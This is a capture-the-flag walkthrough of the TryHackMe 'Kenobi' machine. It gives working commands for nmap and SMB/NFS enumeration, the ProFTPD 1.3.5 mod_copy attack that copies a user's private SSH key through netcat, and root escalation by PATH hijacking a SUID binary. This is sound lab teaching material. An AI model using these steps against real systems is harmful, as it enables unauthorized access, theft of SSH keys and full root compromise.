Kenobi TryHackMe Walkthrough

Challenge Link: https://tryhackme.com/room/kenobi

Scanning

First, we will start the network scanning by running a port scan using nmap, looking for open ports and default scripts.

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ nmap -sC -sV -oN nmap/initial 10.10.209.89
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-06 18:34 IST
Nmap scan report for 10.10.209.89
Host is up (0.17s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      38636/udp6  mountd
|   100005  1,2,3      42497/udp   mountd
|   100005  1,2,3      48661/tcp6  mountd
|   100005  1,2,3      51959/tcp   mountd
|   100021  1,3,4      39973/tcp   nlockmgr
|   100021  1,3,4      40817/udp   nlockmgr
|   100021  1,3,4      43839/tcp6  nlockmgr
|   100021  1,3,4      47091/udp6  nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227) 
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

We have many ports open. We have FTP running on port 21, SSH on port 22, Apache HTTP web server on port 80, RPC on port 111, 2049 and SMB on port 445.

Initial Enumeration

We will first start enumerating the SMB service. To list all the shares, we will use the smbclient command along with the IP address of the machine and leave the password field blank.

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ smbclient -L 10.10.209.89         
Enter WORKGROUP\madhav's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk      
        IPC$            IPC       IPC Service (kenobi server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

We have a SMB share named anonymous. After connecting to the anonymous share, you will find a file named log.txt. We can download it using the commands shown below.

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ smbclient //10.10.209.89/anonymous
Enter WORKGROUP\madhav's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep  4 16:19:09 2019
  ..                                  D        0  Wed Sep  4 16:26:07 2019
  log.txt                             N    12237  Wed Sep  4 16:19:09 2019

                9204224 blocks of size 1024. 6877100 blocks available
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (17.4 KiloBytes/sec) (average 17.4 KiloBytes/sec)
smb: \> exit

Inside the log.txt, there are configs of different services installed in the system. Here we find that there is a user named kenobi and it also has its private SSH key stored in its /home/kenobi/.ssh folder.

We also have a NFS server and when we run a nmap scan with nfs scripts, we find that we can mount /var directory from the machine.

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.209.89 
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-06 19:43 IST
Nmap scan report for 10.10.209.89
Host is up (0.18s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount: 
|_  /var *

Nmap done: 1 IP address (1 host up) scanned in 2.04 seconds

Gaining Access

Next we further move our enumeration to FTP. We have ProFTPD 1.3.5 running on port 21 but we do have the creds or anonymous login enabled to access the server.

If we search ProFTPD 1.3.5 on exploitdb, we get few exploits. There is a File Copy exploit which allows us to copy files via FTP.

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ searchsploit ProFTPD 1.3.5
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution  | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Exe | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Exe | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy                     | linux/remote/36742.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results

To exploit the service, we need to connect to FTP and then we can use CPFR and CPTO commands to copy /home/kenobi/.ssh/id_rsa to /var/tmp, which we can mount to our system using NFS.

So let's connect to the FTP service using netcat and then copy the private SSH key.

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ nc 10.10.209.89 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.209.89]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful

The exploit worked successfully, now we can mount /var directory into our kali machine.

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ mkdir /tmp/kenobiNFS

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ sudo mount 10.10.209.89:/var /tmp/kenobiNFS

Now we can copy the id_rsa from /tmp/kenobiNFS directory and then login as user kenobi via SSH.

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ cp /tmp/kenobiNFS/tmp/id_rsa .

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ chmod 600 id_rsa

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ ssh -i id_rsa kenobi@10.10.209.89               
The authenticity of host '10.10.209.89 (10.10.209.89)' can't be established.
ED25519 key fingerprint is SHA256:GXu1mgqL0Wk2ZHPmEUVIS0hvusx4hk33iTcwNKPktFw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.209.89' (ED25519) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

103 packages can be updated.
65 updates are security updates.


Last login: Wed Sep  4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

kenobi@kenobi:~$ id
uid=1000(kenobi) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
kenobi@kenobi:~$ 

We can now read the user flag present in the home directory of user kenobi.

kenobi@kenobi:~$ ls
share  user.txt
kenobi@kenobi:~$ cat user.txt 
REDACTED

Privilege Escalation

Now that we have a shell on the system as user kenobi, we need to find a way to escalate our privileges to user root. For this, we can search for existing SUIDs using the following command:

find / -type f -perm -u=s 2>/dev/null

We have a binary /usr/bin/menu which has SUID permissions. When we run the binary, it prints a menu which can be used to perform different actions.

This binary is directly passing the commands into the shell. We can confirm this by using the strings command.

To exploit this binary, we will create a vulnerable version of ifconfig so that when the binary will execute ifconfig, our vulnerable version of ifconfig gets executed. This technique is called path variable manipulation.

kenobi@kenobi:~$ cd /tmp
kenobi@kenobi:/tmp$ echo /bin/bash > ifconfig
kenobi@kenobi:/tmp$ chmod 777 ifconfig 
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu 

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@kenobi:/tmp# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)

Hurray, we are root! Now we can read our root flag present in the /root directory.

root@kenobi:/tmp# cd /root/
root@kenobi:/root# ls
root.txt
root@kenobi:/root# cat root.txt 
REDACTED

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Letixmix.